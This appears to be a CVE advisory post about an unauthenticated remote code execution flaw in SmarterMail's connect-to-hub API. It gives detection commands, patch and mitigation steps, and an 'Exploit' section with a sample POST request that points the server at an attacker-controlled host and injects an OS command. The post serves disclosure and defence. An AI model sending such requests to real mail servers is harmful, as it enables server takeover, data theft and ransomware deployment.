SmarterTools SmarterMail, Unauthenticated RCE, CVE-2026-24423 (CRITICAL)

Listen to this Post

The vulnerability is an unauthenticated remote code execution (RCE) flaw in SmarterTools SmarterMail versions prior to build 9511, specifically within the `ConnectToHub` API method (/api/v1/settings/sysadmin/connect-to-hub) defined in `MailService.dll` . This API endpoint explicitly allows anonymous users and processes JSON data sent in POST requests . The root cause is that the endpoint does not properly validate the `hubAddress` parameter within the JSON object. An attacker can point this parameter to a malicious HTTP server they control. The vulnerable SmarterMail server then connects to this attacker-controlled server, which responds with a malicious operating system command embedded within the JSON data . This command is passed to the `CommandMount` parameter and subsequently executed by the vulnerable application on the target system with the privileges of the SmarterMail service, leading to full system compromise . The attack can be mounted against Windows, Linux, Docker, and macOS platforms running the vulnerable software .

dailycve form:

Platform: SmarterTools SmarterMail
Version: Build 9511 earlier
Vulnerability: Unauthenticated RCE via
Severity: CRITICAL 9.3 CVSS
Date: Jan 15 2026

Prediction: Already released (Jan15)

What Undercode Say:

Analytics

Check current SmarterMail version (unauthenticated):

curl -k https://<target-ip>/api/v1/licensing/about | jq '.ProductVersion'

Check for exploitation attempts in logs:

sudo grep -i "connect-to-hub" /var/log/smartermail/.log | grep " 400 "
Select-String -Path "C:\SmarterMail\Logs.log" -Pattern "connect-to-hub" | Select-String " 400 "

Nessus plugin ID for detection: 298241 .

Exploit

1. Setup: Attacker hosts a malicious HTTP server.

2. Payload: JSON payload sent to target API:

POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: <target-smartermail>
Content-Type: application/json
{
"hubAddress": "http://<attacker-ip>:<port>",
"CommandMount": "<malicious-os-command>"
}

3. Execution: Target fetches `CommandMount` value from attacker server and executes it .

Protection from this CVE

  1. Patch: Immediately update to SmarterMail Build 9511 or later . Build 9518 (Jan 22, 2026) also includes the fix .
  2. Mitigation: If patching is impossible, restrict network access to the API endpoint `/api/v1/settings/sysadmin/connect-to-hub` using a firewall or web application firewall (WAF) to block unauthenticated external requests .
  3. Monitor: Monitor for any POST requests to the `connect-to-hub` endpoint, as these are highly indicative of malicious activity in unpatched systems .

Impact

System Compromise: Unauthenticated attackers can achieve complete remote code execution, leading to full server takeover .
Data Breach: Successful exploitation allows attackers to access all emails, credentials, and sensitive data stored on the mail server .
Ransomware Deployment: CISA has confirmed this vulnerability is being actively exploited in ransomware campaigns, posing a severe operational and financial risk .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top